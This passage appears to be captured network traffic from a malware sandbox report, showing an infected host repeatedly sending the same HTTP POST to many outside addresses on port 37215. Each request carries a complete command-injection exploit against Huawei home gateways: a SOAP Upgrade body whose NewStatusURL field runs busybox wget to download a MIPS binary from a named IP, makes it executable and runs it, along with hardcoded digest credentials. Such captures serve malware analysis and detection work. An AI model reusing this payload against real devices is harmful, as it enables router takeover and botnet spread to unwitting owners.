                    Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.64.221 -l /tmp/.unstable -r /t3t3t3t3t3t3t3t3pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                    Jun 1, 2024 18:15:59.511782885 CEST880OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                    Content-Length: 430
                    Connection: keep-alive
                    Accept: */*
                    Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                    Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 36 34 2e 32 32 31 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 33 74 33 74 33 74 33 74 33 74 33 74 33 74 33 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 2e 6d 69 70 73 3b 20 2f 62 [TRUNCATED]
                    Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.64.221 -l /tmp/.unstable -r /t3t3t3t3t3t3t3t3pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                    Jun 1, 2024 18:16:03.031296015 CEST880OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                    Content-Length: 430
                    Connection: keep-alive
                    Accept: */*
                    Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                    Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 36 34 2e 32 32 31 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 33 74 33 74 33 74 33 74 33 74 33 74 33 74 33 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 2e 6d 69 70 73 3b 20 2f 62 [TRUNCATED]
                    Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.64.221 -l /tmp/.unstable -r /t3t3t3t3t3t3t3t3pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                    Jun 1, 2024 18:16:09.942322969 CEST880OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                    Content-Length: 430
                    Connection: keep-alive
                    Accept: */*
                    Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                    Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 36 34 2e 32 32 31 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 33 74 33 74 33 74 33 74 33 74 33 74 33 74 33 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 2e 6d 69 70 73 3b 20 2f 62 [TRUNCATED]
                    Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.64.221 -l /tmp/.unstable -r /t3t3t3t3t3t3t3t3pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                    Session IDSource IPSource PortDestination IPDestination Port
                    639192.168.2.234120441.66.66.14137215
                    TimestampBytes transferredDirectionData
                    Jun 1, 2024 18:15:56.288014889 CEST880OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                    Content-Length: 430
                    Connection: keep-alive
                    Accept: */*
                    Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                    Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 36 34 2e 32 32 31 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 33 74 33 74 33 74 33 74 33 74 33 74 33 74 33 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 2e 6d 69 70 73 3b 20 2f 62 [TRUNCATED]
                    Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.64.221 -l /tmp/.unstable -r /t3t3t3t3t3t3t3t3pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                    Session IDSource IPSource PortDestination IPDestination Port
                    640192.168.2.2353540197.92.83.6137215
                    TimestampBytes transferredDirectionData
                    Jun 1, 2024 18:15:56.288049936 CEST880OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                    Content-Length: 430
                    Connection: keep-alive
                    Accept: */*
                    Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                    Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 36 34 2e 32 32 31 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 33 74 33 74 33 74 33 74 33 74 33 74 33 74 33 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 2e 6d 69 70 73 3b 20 2f 62 [TRUNCATED]
                    Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.64.221 -l /tmp/.unstable -r /t3t3t3t3t3t3t3t3pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                    Session IDSource IPSource PortDestination IPDestination Port
                    641192.168.2.235379641.199.32.6837215
                    TimestampBytes transferredDirectionData
                    Jun 1, 2024 18:15:56.288088083 CEST880OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                    Content-Length: 430
                    Connection: keep-alive
                    Accept: */*
                    Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                    Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 36 34 2e 32 32 31 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 33 74 33 74 33 74 33 74 33 74 33 74 33 74 33 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 2e 6d 69 70 73 3b 20 2f 62 [TRUNCATED]
                    Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.64.221 -l /tmp/.unstable -r /t3t3t3t3t3t3t3t3pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                    Session IDSource IPSource PortDestination IPDestination Port
                    642192.168.2.2354864156.126.149.6537215
                    TimestampBytes transferredDirectionData
                    Jun 1, 2024 18:15:56.288115025 CEST880OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                    Content-Length: 430
                    Connection: keep-alive
                    Accept: */*
                    Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                    Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 36 34 2e 32 32 31 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 33 74 33 74 33 74 33 74 33 74 33 74 33 74 33 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 2e 6d 69 70 73 3b 20 2f 62 [TRUNCATED]
                    Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.64.221 -l /tmp/.unstable -r /t3t3t3t3t3t3t3t3pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                    Session IDSource IPSource PortDestination IPDestination Port
                    643192.168.2.2341042197.216.2.21837215
                    TimestampBytes transferredDirectionData
                    Jun 1, 2024 18:15:56.288149118 CEST880OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                    Content-Length: 430
                    Connection: keep-alive
                    Accept: */*
                    Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                    Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 36 34 2e 32 32 31 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 33 74 33 74 33 74 33 74 33 74 33 74 33 74 33 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 2e 6d 69 70 73 3b 20 2f 62 [TRUNCATED]
                    Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.64.221 -l /tmp/.unstable -r /t3t3t3t3t3t3t3t3pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                    Session IDSource IPSource PortDestination IPDestination Port
                    644192.168.2.2353054197.121.209.23537215
                    TimestampBytes transferredDirectionData
                    Jun 1, 2024 18:15:56.288192034 CEST880OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                    Content-Length: 430
                    Connection: keep-alive
                    Accept: */*
                    Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                    Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 36 34 2e 32 32 31 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 33 74 33 74 33 74 33 74 33 74 33 74 33 74 33 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 2e 6d 69 70 73 3b 20 2f 62 [TRUNCATED]
                    Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.64.221 -l /tmp/.unstable -r /t3t3t3t3t3t3t3t3pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                    Session IDSource IPSource PortDestination IPDestination Port
                    645192.168.2.2360002197.169.240.11337215
                    TimestampBytes transferredDirectionData
                    Jun 1, 2024 18:15:56.305702925 CEST880OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                    Content-Length: 430
                    Connection: keep-alive
                    Accept: */*
                    Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                    Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 36 34 2e 32 32 31 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 33 74 33 74 33 74 33 74 33 74 33 74 33 74 33 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 2e 6d 69 70 73 3b 20 2f 62 [TRUNCATED]
                    Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.64.221 -l /tmp/.unstable -r /t3t3t3t3t3t3t3t3pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                    Session IDSource IPSource PortDestination IPDestination Port
                    646192.168.2.2333730156.168.190.12337215
                    TimestampBytes transferredDirectionData
                    Jun 1, 2024 18:15:56.305747032 CEST880OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                    Content-Length: 430
                    Connection: keep-alive
                    Accept: */*
                    Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
